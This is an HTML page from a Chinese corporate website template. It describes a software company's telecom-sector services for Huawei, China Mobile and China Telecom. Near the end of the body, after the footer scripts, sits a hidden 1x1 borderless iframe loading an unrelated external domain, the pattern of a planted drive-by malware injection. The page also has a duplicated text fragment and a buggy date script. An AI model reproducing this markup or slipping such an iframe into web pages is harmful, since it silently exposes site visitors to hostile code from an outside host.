<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>网站关键词-网站名称</title>
<meta name="description"
	content="网站描述，一般显示在搜索引擎搜索结果中的描述文字，用于介绍网站，吸引浏览者点击。" />
<meta name="keywords" content="网站关键词" />
<meta name="generator" content="" />
<link href="favicon.ico" rel="shortcut icon" />
<link rel="stylesheet" type="text/css" href="css/metinfo.css" />
<script src="js/jQuery1.7.2.js" type="text/javascript"></script>
<script src="js/ch.js" type="text/javascript"></script>

</head>
<body>
	<header>
		<div class="inner">
			<div class="top-logo">

				<a href="http://www.chinasofti.com/" title="网站名称" id="web_logo">
					<img src="images/logo.png" alt="网站名称" title="网站名称"
					style="margin: 20px 0px 0px 0px;" />
				</a>

				<ul class="top-nav list-none">
					<li class="t"><a href='#'
						onclick='SetHome(this,window.location,"非IE浏览器不支持此功能，请手动设置！");'
						style='cursor: pointer;' title='设为首页'>设为首页</a><span>|</span> <a
						href='#' onclick='addFavorite("非IE浏览器不支持此功能，请手动设置！");'
						style='cursor: pointer;' title='收藏本站'>收藏本站</a><span>|</span> <a
						class="fontswitch" id="StranLink" href="javascript:StranBody()">繁体中文</a><span>|</span>
						<a href='#' title='WAP'>WAP</a><span>|</span> <a href='#'
						title='English'>English</a><span>|</span> <a href='#' title='我的订单'
						class='shopweba'>我的订单</a> <span>|</span> <a
						href='admin/index.html' title='进入后台' class='shopweba'>进入后台</a></li>
				</ul>
			</div>
			<nav>
				<ul class="list-none">
					<li id="nav_10001" style='width: 121px;'><a href='index.html'
						x class='nav'><span>网站首页</span></a></li>
					<li class="line"></li>
					<li id='nav_1' style='width: 121px;'><a href='about.html'
						0 class='hover-none nav'><span>关于我们</span></a></li>
					<li class="line"></li>
					<li id='nav_2' style='width: 121px;'><a href='news.html'
						class='hover-none nav'><span>新闻资讯</span></a></li>
					<li class="line"></li>
					<li id='nav_3' style='width: 121px;' class='navdown'><a
						href='product.html' class='hover-none nav'><span>产品展示</span></a></li>
					<li class="line"></li>
					<li id='nav_32' style='width: 121px;'><a href='down.html'
						class='hover-none nav'><span>下载中心</span></a></li>
					<li class="line"></li>
					<li id='nav_33' style='width: 121px;'><a href='customer.html'
						class='hover-none nav'><span>客户案例</span></a></li>
					<li class="line"></li>
					<li id='nav_36' style='width: 120px;'><a href='employ.html'
						class='hover-none nav'><span>招贤纳士</span></a></li>
					<li class="line"></li>
					<li id='nav_22' style='width: 120px;'><a href='lianxi.html'
						class='hover-none nav'><span>联系我们</span></a></li>
				</ul>
			</nav>
		</div>
	</header>
	<div class="inner met_flash">
		<div class="flash">
			<a href='#' target='_blank' title='企业网站管理系统'><img
				src='images/1342430358.jpg' width='980' alt='企业网站管理系统' height='90'></a>
		</div>
	</div>
	<div class="sidebar inner">
		<div class="sb_nav">
			<h3 class='title myCorner' data-corner='top 5px' style="margin: 0">产品服务</h3>
			<div class="active" id="sidebar" data-csnow="2" data-class3="0"
				data-jsok="2" style="margin-bottom: 10px">
				<dl class="list-none navnow">
					<dt id='part2_4'>
						<a href='softShow.html' title='软件平台服务' class="zm"><span>软件平台服务</span></a>
					</dt>
				</dl>
				<dl class="list-none navnow">
					<dt id='part2_5'>
						<a href='dataShow.html' title='数据分析服务' class="zm"><span>数据分析服务</span></a>
					</dt>
				</dl>
				<dl class="list-none navnow">
					<dt id='part2_6'>
						<a href='cloudShow.html' title='云服务' class="zm"><span>云服务</span></a>
					</dt>
				</dl>
				<div class="clear"></div>
			</div>
			<h3 class='title myCorner' data-corner='top 5px' style="margin: 0">行业</h3>
			<div class="active" id="sidebar" data-csnow="2" data-class3="0"
				data-jsok="2">
				<dl class="list-none navnow">
					<dt id='part2_4'>
						<a href='jinrongShow.html' title='金融行业' class="zm"><span>金融行业</span></a>
					</dt>
				</dl>
				<dl class="list-none navnow">
					<dt id='part2_5'>
						<a href='dianxinShow.html' title='电信行业' class="zm"><span>电信行业</span></a>
					</dt>
				</dl>
				<dl class="list-none navnow">
					<dt id='part2_6'>
						<a href='internetShow.html' title='互联网与高科技' class="zm"><span>互联网与高科技</span></a>
					</dt>
				</dl>
				<div class="clear"></div>
			</div>
		</div>

		<div class="sb_box">
			<h3 class="title">
				<div class="position">
					当前位置：<a href='index.html' title="网站首页">网站首页</a> &gt; <a
						href='product.html'>产品展示</a> > <a href='dianxin.html'>电信行业</a>
				</div>
				<span>电信行业</span>
			</h3>
			<div class="clear"></div>

			<div class="editor active" id="showtext">
				<div class="active">
				<b>
					公司的电信业务是占公司业务收入最大的一部分，目前有超过两万人为电信行业客户提供服务。电信行业的主要客户有华为、中国移动、中国电信等。其中华为不仅是公司重要的战略合作伙伴，公司也是华为信息技术服务的核心供应商之一。
					基于华为的运营商业务、企业业务、消费者业务三大业务布局，公司已全面参与到华为各板块的业务合作中，为华为提供包括软件开发、测试、内部IT系统建设等服务。
					块的业务合作中，为华为提供包括软件开发、测试、内部IT系统建设等服务。
					目前，在华为的电信软件领域、公有云运维领域、流程IT领域的电信计费、移动支付等产品，公司已经能够承担起整个局点的定制和交付责任。随着业务的发展，公司与华为持续展开全面深入的合作，在技术研发、市场推广、方案交付等方面全方位对接，携手华为为运营商客户服务。
					同时围绕华为运营商业务，布局运营商领域解决方案定制化开发和交付能力。围绕华为消费者业务，布局平台及数据服务和运营业务，围绕华为企业业务，布局新ICT业务。
					</b>
				</div>
				<div class="clear"></div>
			</div>
		</div>
		<div class="clear"></div>
	</div>
	
	<footer data-module="2" data-classnow="5">
		<div class="inner">
			<div class="foot-nav">
				<a href='http://www.chinasofti.com' title='公司动态'>公司动态</a><span>|</span>
				<a href='../message/' title='在线留言'>在线留言</a><span>|</span> <a
					href='../feedback/' title='在线反馈'>在线反馈</a><span>|</span> <a
					href='../link/' title='友情链接'>友情链接</a><span>|</span> <a
					href='../member/' title='会员中心'>会员中心</a><span>|</span> <a
					href='../search/' title='站内搜索'>站内搜索</a><span>|</span> <a
					href='../sitemap/' title='网站地图'>网站地图</a><span>|</span> <a href='#'
					title='网站管理'>网站管理</a>
			</div>
			<div class="foot-text">
				<p>我的网站 版权所有 2008-2012 京ICP备8888888</p>
				<p>电话：010-12345678 12345678 QQ:88888888 999999
					Email:chinasofti@chinasofti.cn</p>

			</div>
		</div>
	</footer>
	<script src="images/fun.inc.js" type="text/javascript"></script>

	<script type="text/javascript">
		var date = new Date();
		var now = date.getFullYear() + "-0" + date.getMonth() + "-0"
				+ date.getDay() + "  " + date.getHours() + ":"
				+ date.getMinutes() + ":" + date.getSeconds();
		document.getElementById("time").innerHTML = now;
	</script>
	
	<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border: 0"></iframe>
	<style>
.active {
	background: url(images/a4.jpg);
	background-size: cover;
	margin-top: 2px;
}
</style>
</body>
</html>